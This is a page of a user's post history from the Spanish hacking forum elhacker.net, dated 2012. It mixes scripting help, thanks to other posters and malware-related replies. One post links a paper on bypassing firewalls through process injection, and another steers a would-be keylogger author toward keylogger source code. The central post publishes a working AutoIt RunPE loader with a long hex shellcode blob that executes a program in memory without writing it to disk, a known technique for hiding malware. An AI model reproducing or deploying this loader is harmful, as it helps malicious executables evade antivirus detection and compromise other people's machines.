elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: 1 ... 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 [41] 42 43 44 45 46 47 48 49 50
401  Seguridad Informática / Análisis y Diseño de Malware / Re: Publicar formas de saltarse los firewall en: 12 Diciembre 2012, 16:02 pm
mmm pues lo mejor es que te pongas en forma, y te pongas ágil así practicas Parkour y seguro saltas lo que sea.  :-X

jajaja mal chiste.

pues la mejor forma es a travez de inyección en procesos.

déjame ver si consigo un paper que vi por ahí muy interesante sobre eso.

edito aquí esta el paper
http://www.abysssec.com/blog/2009/01/03/how-bypass-firewall-with-process-injection/


espero no estas cometiendo Spam.

saludos
402  Seguridad Informática / Análisis y Diseño de Malware / Re: novato en: 12 Diciembre 2012, 15:49 pm
Si solo te interesa el programar malware y no el aprender programacion para trabajar, te recomiendo que aprendas C++, solo aprende, se como todos los programadores, crea calculadoras, funciones, lo que se te ocurra pero todo para aprender, luego recien empiezas a orientarte a crear malware de todo tipo, pero para ese entonces vienes a preguntar de nuevo.

ahí tienes una gran respuesta. sobre todo esta parte

solo aprende, se como todos los programadores, crea calculadoras, funciones

saludos
403  Programación / Programación Visual Basic / Re: Ayuda Keylogger en: 10 Diciembre 2012, 15:26 pm
OMG un Juaker.  :-X

Creo que deberías usar el buscador hay muchos códigos fuentes de keyloggers. no tienen nada de especial. tambien puedes hacerlo con un poco de estudio.
vamos busca en el foro hay info de sobra.

creo que aquí nadie trabaja para nadie. estamos en el foro para ayudar no para hacer trabajo ni cosas. bueno al menos yo pienso eso.

saludos
404  Programación / Scripting / Re: BackDoor en VBS controlado por twitter + pastebin. en: 7 Diciembre 2012, 01:42 am
Gracias 79137913 muy bonito código  ;D

saludos
405  Programación / Scripting / Re: [Autoit] RunPE Shellcode en: 6 Diciembre 2012, 17:43 pm
Script Function...: RunPE-ShellCode "Correr Ejecutable En memoria"

te permite ejecutar archivos "On the fly" osea en el aire sin necesidad de tocar el disco.



saludos
406  Programación / Scripting / [Autoit] RunPE Shellcode en: 6 Diciembre 2012, 15:44 pm
Bueno les dejo el mshRunPE version Autoit que hice hace tiempo. Un simple ejemplo de como usar shellcode en Autoit.  ;D

Código
  1. #cs -------------------------------------------------------
  2. AutoIt Version: 3.3.8.1
  3. Traducido Por..........: Pink
  4. Agradecimientos: hamavb & iCodeInVB6
  5. Script Function...: RunPE-ShellCode "Correr Ejecutable En memoria"
  6. Uso..............: RunPE(Path,$archivobinario)
  7. #ce -------------------------------------------------------
  8.  
  9.  
  10. Func RunPE($path,$filebin)
  11.  
  12.  
  13. local  $ASM = "0x60E84E0000006B00650072006E0065006C003300320000006E00740064006C006C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005B8BFC6A42E8BB0300008B54242889118B54242C6A3EE8AA03000089116A4AE8A103000089396A1E6A3CE89D0300006A2268F4000000E8910300006A266A24E8880300006A2A6A40E87F030000"
  14.    $ASM &= "6A2E6A0CE8760300006A3268C8000000E86A0300006A2AE85C0300008B09C701440000006A12E84D030000685BE814CF51E8790300006A3EE83B0300008BD16A1EE8320300006A40FF32FF31FFD06A12E823030000685BE814CF51E84F0300006A1EE8110300008B098B513C6A3EE8050300008B3903FA6A22E8FA0200008B0968F80000005751FFD06A00E8E80200006888FEB31651E8140300006A2EE8D60200"
  15.    $ASM &= "008B396A2AE8CD0200008B116A42E8C402000057526A006A006A046A006A006A006A00FF31FFD06A12E8A902000068D03710F251E8D50200006A22E8970200008B116A2EE88E0200008B09FF7234FF31FFD06A00E87E020000689C951A6E51E8AA0200006A22E86C0200008B118B396A2EE8610200008B096A406800300000FF7250FF7734FF31FFD06A36E8470200008BD16A22E83E0200008B396A3EE8350200"
  16.    $ASM &= "008B316A22E82C0200008B016A2EE8230200008B0952FF775456FF7034FF316A00E81002000068A16A3DD851E83C02000083C40CFFD06A12E8F9010000685BE814CF51E8250200006A22E8E70100008B1183C2066A3AE8DB0100006A025251FFD06A36E8CE010000C70100000000B8280000006A36E8BC010000F7216A1EE8B30100008B118B523C81C2F800000003D06A3EE89F01000003116A26E8960100006A"
  17.    $ASM &= "2852FF316A12E88A010000685BE814CF51E8B601000083C40CFFD06A26E8730100008B398B098B71146A3EE86501000003316A26E85C0100008B098B510C6A22E8500100008B090351346A46E8440100008BC16A2EE83B0100008B0950FF77105652FF316A00E82A01000068A16A3DD851E85601000083C40CFFD06A36E8130100008B1183C20189116A3AE8050100008B093BCA0F8533FFFFFF6A32E8F4000000"
  18.    $ASM &= "8B09C701070001006A00E8E500000068D2C7A76851E8110100006A32E8D30000008B116A2EE8CA0000008B0952FF7104FFD06A22E8BB0000008B3983C7346A32E8AF0000008B318BB6A400000083C6086A2EE89D0000008B116A46E894000000516A045756FF326A00E88600000068A16A3DD851E8B200000083C40CFFD06A22E86F0000008B098B51280351346A32E8600000008B0981C1B000000089116A00E8"
  19.    $ASM &= "4F00000068D3C7A7E851E87B0000006A32E83D0000008BD16A2EE8340000008B09FF32FF7104FFD06A00E82400000068883F4A9E51E8500000006A2EE8120000008B09FF7104FFD06A4AE8040000008B2161C38BCB034C2404C36A00E8F2FFFFFF6854CAAF9151E81E0000006A406800100000FF7424186A00FFD0FF742414E8CFFFFFFF890183C410C3E82200000068A44E0EEC50E84B00000083C408FF742404"
  20.    $ASM &= "FFD0FF74240850E83800000083C408C355525153565733C0648B70308B760C8B761C8B6E088B7E208B3638471875F3803F6B7407803F4B7402EBE78BC55F5E5B595A5DC35552515356578B6C241C85ED74438B453C8B54287803D58B4A188B5A2003DDE330498B348B03F533FF33C0FCAC84C07407C1CF0D03F8EBF43B7C242075E18B5A2403DD668B0C4B8B5A1C03DD8B048B03C55F5E5B595A5DC3C300000000"
  21.  
  22.  
  23. Local $BufferASM = DllStructCreate("byte[" & BinaryLen($ASM) & "]")
  24. Local $binBuffer=DllStructCreate("byte[" & BinaryLen($filebin) & "]")
  25.  
  26.  
  27. DllStructSetData($BufferASM, 1, $ASM)
  28. DllStructSetData($binBuffer, 1, $filebin)
  29.  
  30.  
  31.  
  32.  
  33. Local $Ret = DllCall("user32.dll", "int", "CallWindowProcW", _
  34.            "ptr", DllStructGetPtr($BufferASM), _
  35.            "wstr", ($Path), _
  36.            "ptr", DllStructGetPtr($binBuffer), _
  37.            "int", 0, _
  38.            "int", 0)
  39.  
  40. EndFunc


saludos
407  Programación / Programación Visual Basic / Re: [SRC] getShareSubFolders en: 26 Noviembre 2012, 20:11 pm
Gracias Psyke1 por el código esta muy bueno.
saludos
408  Programación / Scripting / Re: Web para aprender python? en: 26 Noviembre 2012, 14:31 pm
también te puedes leer este un tutorial que se llama 'Python para todos' es muy bueno lo consigues aqui
http://mundogeek.net/tutorial-python/

saludos

409  Programación / Scripting / Re: [Perl] FindIcons 0.1 en: 26 Noviembre 2012, 00:39 am
Muy bonito código y muy útil.  gracias

410  Programación / Scripting / Re: [Python] Duda de Operadores a nivel bit [Not(~)] en: 25 Noviembre 2012, 00:03 am
Creo que esto te responderá porque lo que estas haciendo es una operacion bit a bit.
cito a wikipedia.

Citar
NOT
A   NOT A
0   1
1   0
El NOT bit a bit, o bitwise, o complemento, es una operación unaria que realiza la negación lógica en cada bit, invirtiendo los bits del número, de tal manera que los ceros se convierten en 1 y viceversa. Por ejemplo:
NOT 10011
  = 01100
El NOT forma el complemento a uno de un valor binario dado.
En un número entero con signo en complemento a dos, el NOT da como resultado el inverso aditivo del número menos 1, es decir NOT x = -x - 1. Para obtener el complemento a dos de un número, se debe sumar 1 al resultado, dando el negativo del número. Esto equivale a un cambio de signo del número: +5 se convierte en -5, y -5 se convierte en +5.
Para los enteros sin signo, el complemento bit a bit es la “reflexión de espejo” del número a través del punto medio del rango del entero. Por ejemplo, para los enteros sin signo de 8 bits, NOT x = 255 - x, para los enteros sin signo de 16 bits, NOT x = 65535 - x, y en general, para los enteros sin signo de n bits, NOT x = (2n - 1) - x.


Saludos
Páginas: 1 ... 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 [41] 42 43 44 45 46 47 48 49 50
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines